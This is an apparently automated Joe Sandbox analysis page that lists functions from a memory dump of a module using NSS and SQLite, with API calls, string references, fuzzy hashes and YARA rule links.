EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CA89B8A,00000000,6CA82D6B), ref: 6CAA0A30
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CA89B8A,00000000,6CA82D6B), ref: 6CAA0A48

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
String ID:
API String ID: 115324291-0
Opcode ID: 018d7cdb41624bb1060eaeaccc945fbcdc250734dfdeaccf1477294b936af896
Instruction ID: 7fbec9d20225b7d4498799b017f248e1bc4607bc2b57434ef16898b796f85d9e
Opcode Fuzzy Hash: 018d7cdb41624bb1060eaeaccc945fbcdc250734dfdeaccf1477294b936af896
Instruction Fuzzy Hash: 5502E4B1D002459FEB008FA5DE41BAB77B5FF48358F180129D906A7B52E731ED8ACB91

Function 6CB16BE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CB16C2C

Part of subcall function 6CB16E90: PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CB16BF7), ref: 6CB16EB6
Part of subcall function 6CB16E90: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CBBFC0A,6CB16BF7), ref: 6CB16ECD
Part of subcall function 6CB16E90: ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CB16EE0
Part of subcall function 6CB16E90: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CB16EFC
Part of subcall function 6CB16E90: PR_NewLock.NSS3 ref: 6CB16F04
Part of subcall function 6CB16E90: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB16F18
Part of subcall function 6CB16E90: PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CB16BF7), ref: 6CB16F30
Part of subcall function 6CB16E90: PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CB16BF7), ref: 6CB16F54

TlsGetValue.KERNEL32 ref: 6CB16D93
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CB16BF7), ref: 6CB16FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CB16BF7), ref: 6CB16FFD

Strings

NSS_SSL_CBC_RANDOM_IV, xrefs: 6CB16FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CB16FDB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Secure$Value$Lockfclosefopenftellfwrite
String ID: NSS_SSL_CBC_RANDOM_IV$NSS_SSL_REQUIRE_SAFE_NEGOTIATION
API String ID: 3032383292-3007362596
Opcode ID: 26f9cbe25ca80d16a808ab851ba1522d6458684b5b8b5ac69aca3044cb51e453
Instruction ID: 370d57ff4a443e14bc0284bb4113e551d3fa37ee3771573d33a6c8fc387c7247
Opcode Fuzzy Hash: 26f9cbe25ca80d16a808ab851ba1522d6458684b5b8b5ac69aca3044cb51e453
Instruction Fuzzy Hash: 2B714BB234C5E4DBDB698B2CD5A152437B1E75B788B40821ACD03CBF91DF306942D752

Function 6CA60820 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000001,00000001), ref: 6CA611D2

Strings

authorizer malfunction, xrefs: 6CA61BD2
rows deleted, xrefs: 6CA617D2
@, xrefs: 6CA60B17
not authorized, xrefs: 6CA6175E, 6CA61763

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memset
String ID: @$authorizer malfunction$not authorized$rows deleted
API String ID: 2221118986-4041583037
Opcode ID: 6d853f81f9d143aa558238ebb7f7c4ec5262526fe02e9230d3e7b737e9da0218
Instruction ID: bd5f7560b139f3d91e0dfe2cfc57db40c863078e943ea599f3d9983c7447fec9
Opcode Fuzzy Hash: 6d853f81f9d143aa558238ebb7f7c4ec5262526fe02e9230d3e7b737e9da0218
Instruction Fuzzy Hash: 1BD28D70E04259CFDB14CFAAC484BADBBB2FF49308F188169D515ABB51D771E896CB80

Function 6CB2C9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 6CB2CEA5

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: NormalizeTime
String ID:
API String ID: 1467309002-0
Opcode ID: 5fc8ccd99d626210fb5a04d0f0093397215573de326d7a4e89e87d50f4087b36
Instruction ID: 87b20530753be0823ae1359966a4741e7e873e684f07357dc885ad3b9f5b87e4
Opcode Fuzzy Hash: 5fc8ccd99d626210fb5a04d0f0093397215573de326d7a4e89e87d50f4087b36
Instruction Fuzzy Hash: 77717071A057418FD704DF38D48062ABBE5FF89314F258A2DE4A9CB7A0E734E945CB92

Function 6CB9CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB9D086
PR_Malloc.NSS3(00000001), ref: 6CB9D0B9
PR_Free.NSS3(?), ref: 6CB9D138

Strings

>, xrefs: 6CB9CF5B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: d1f90d8b00ca302026f03bc78d437cff24462d055e9b955503f0535ed6d8b8fb
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 5FD16C23B855D60BEB14487E9CB13EA77A3C743374F684339D5229BBE5E6198847C302

Function 6CB3AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a5f84307b7e0d652df3d55bb203ca45af8014b42de7e500d235a14a032c10e
Instruction ID: 46fe0f75220a8ec385859250870b48024ed9741448b317eee037fba37151d98a
Opcode Fuzzy Hash: c6a5f84307b7e0d652df3d55bb203ca45af8014b42de7e500d235a14a032c10e
Instruction Fuzzy Hash: 74F1E071F055E68BDB04CF68C8517ADB7B9EB4A348F29422DC909DB744EB70A941CBC1

Function 6CA66900 Relevance: 6.3, Strings: 4, Instructions: 1257COMMON

Download Yara Rule

Strings

BBB, xrefs: 6CA67207, 6CA6780B
sqlite\_%, xrefs: 6CA66953
authorizer malfunction, xrefs: 6CA67910
not authorized, xrefs: 6CA678EC, 6CA678F1

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: BBB$authorizer malfunction$not authorized$sqlite\_%
API String ID: 3412268980-2664116055
Opcode ID: 4535bd3ad552ea3bfa9627d774dbe7ce974c766591d799998a69481b0fa4fa7d
Instruction ID: 133afd74e0ec29425020e0f0061ccdb863f6e1f314f7bbc767c58059a84a7793
Opcode Fuzzy Hash: 4535bd3ad552ea3bfa9627d774dbe7ce974c766591d799998a69481b0fa4fa7d
Instruction Fuzzy Hash: C6C29174A04205CFCB14CF59C484AA9BBF2FF89308F2481ADD915ABB55D736A996CF80

Function 6CA16F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

sz=[0-9]*, xrefs: 6CA17049
*?[, xrefs: 6CA17034, 6CA17052, 6CA17070
unordered*, xrefs: 6CA1702B
noskipscan*, xrefs: 6CA17067

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: 4affbe6ec5364aff2b917ce65906bf96e874393e38be6523894a4c1c8f6e876e
Instruction ID: 157236941d5418a3f5e0bb3ee32fdb522f7e14a698edac0df6596f47195ea7d9
Opcode Fuzzy Hash: 4affbe6ec5364aff2b917ce65906bf96e874393e38be6523894a4c1c8f6e876e
Instruction Fuzzy Hash: 5F71AD36F082114BEB148E6DC8807AE73A29F85324F295278CD59EBFD1D6718CCA87C1

Function 6CB50B40 Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_bind_int64.NSS3(?,?,?,?), ref: 6CB50B7C
sqlite3_bind_double.NSS3 ref: 6CB50BF1
sqlite3_bind_zeroblob.NSS3(?,?,00000000), ref: 6CB50C27

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_bind_zeroblob
String ID:
API String ID: 4141409403-0
Opcode ID: 92f659f89dd3a17d5da8065c9e9dca94c444802c38e244780aa0ca2c2c237af0
Instruction ID: 978af9f4f62b21b4814dfc0f249de2d944ccf3cfa94fc3061994a95b0f04574b
Opcode Fuzzy Hash: 92f659f89dd3a17d5da8065c9e9dca94c444802c38e244780aa0ca2c2c237af0
Instruction Fuzzy Hash: 05217832E485D09FD7016F58AC9096AB7B9EF8B77CF498245F8940B391EB309821C7D2

Function 6CA564D0 Relevance: 3.2, Strings: 2, Instructions: 724COMMON

Download Yara Rule

Strings

authorizer malfunction, xrefs: 6CA56E3E
not authorized, xrefs: 6CA56D47, 6CA56D4C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID: authorizer malfunction$not authorized
API String ID: 0-2411240822
Opcode ID: 1ca6d7a313d03250d8ae1dfe3d422ebd098944d00d98d063cfa062cc1fb69934
Instruction ID: cf4232fb90fee35150b50bd5d3737d4eb9defa44922cba737dbc2b2cff94f77a
Opcode Fuzzy Hash: 1ca6d7a313d03250d8ae1dfe3d422ebd098944d00d98d063cfa062cc1fb69934
Instruction Fuzzy Hash: 3E626F70A04204CFDB14CF19C484AA9BBF2FF89308F65C1ADD9159B766D736E996CB80

Function 6CAAEE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAAF019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6CAAF0F9

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: d822850f29e5448d655a1b1a6d8567b6bf814c20ab1c8378c97cc5802d65d543
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 11919171A0161A8FCB18CFA9C8916AEB7F1FF85324F14462DD962A7BC0D730A946CB51

Function 6CAD2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6CAF7929), ref: 6CAD2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6CAF7929), ref: 6CAD2FE0

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: 301f2c07fbb3824abc931573c0922ddda939db4d4d264ced451e52b8be51b9bb
Instruction ID: 913f6ae16ab0974eed5967529f3afc44afe9e149787cf72791f47ddbd575e43c
Opcode Fuzzy Hash: 301f2c07fbb3824abc931573c0922ddda939db4d4d264ced451e52b8be51b9bb
Instruction Fuzzy Hash: 7651E3B1A069128FD710CE59C880B6A73B1FF49718F2B4269D9899BB01D731F9C6CB81

Function 6CAF0E20 Relevance: 2.8, APIs: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6CAF1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6CAF1086

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 47c43b62e04968b1af0439b9ab0dfc3f8f410fc04901c9c9ad253b9661d921ea
Instruction ID: b052d6d29ff225be767c1d5bec2382757aeb28e9988c53e9225f5dd9ad26f4bc
Opcode Fuzzy Hash: 47c43b62e04968b1af0439b9ab0dfc3f8f410fc04901c9c9ad253b9661d921ea
Instruction Fuzzy Hash: 8CA13D71B0124A9FDF08CF99C990AEEBBB6BF48314B198129F915A7700D735ED52CB90

Function 6CA1AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CA1AE9F
winUnlock, xrefs: 6CA1AE18

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 2e4033b349817f0b16e425e0b9190eb1be1d68d1ad95d476c89c433f81bba03c
Instruction ID: 8249dafdd5252e9b6d639848d35baa4882748111f3b796a7d621bab4479670a6
Opcode Fuzzy Hash: 2e4033b349817f0b16e425e0b9190eb1be1d68d1ad95d476c89c433f81bba03c
Instruction Fuzzy Hash: 25718E706082409FDB04CF28D894AAABBF6FF89314F14CA29F95997641D730AD85CBD1

Function 6CA449F0 Relevance: 1.9, APIs: 1, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c36556b557c6bde165acaabc86bdbbe52b774acd197f3d6b41242e347e07445
Instruction ID: 8ee2010e142408844e0ba97fe1d5bae5756c264c6f3166b9b828cb0363549492
Opcode Fuzzy Hash: 8c36556b557c6bde165acaabc86bdbbe52b774acd197f3d6b41242e347e07445
Instruction Fuzzy Hash: 50525A74E042098FDB04CF59C480BAEBBF2FF89318F29C169D815AB755D735A986CB90

Function 6CADED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CADEE3D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 58e289df321c4efc96f4897095cd0dbb30dce94899feec801ad1683a8222e8ac
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 4C71C372E017058BD718CF59C8806AAF7F2BF88304F1A462DD85697B91DB70F984CB91

Function 6CA14DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CA15125

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: 88acae90235364c9928176033d998d316bf2621265a367e2381c6d84cb5c8476
Instruction ID: 70a879acaa381ebe3e5903b7a9ea35b863a926a45d5c6de3de99829e045631bb
Opcode Fuzzy Hash: 88acae90235364c9928176033d998d316bf2621265a367e2381c6d84cb5c8476
Instruction Fuzzy Hash: 11E11970A083408FDB09DF28D59465ABBF1FF89718F158A2DF88997751E730A985CF82

Function 6CA48960 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
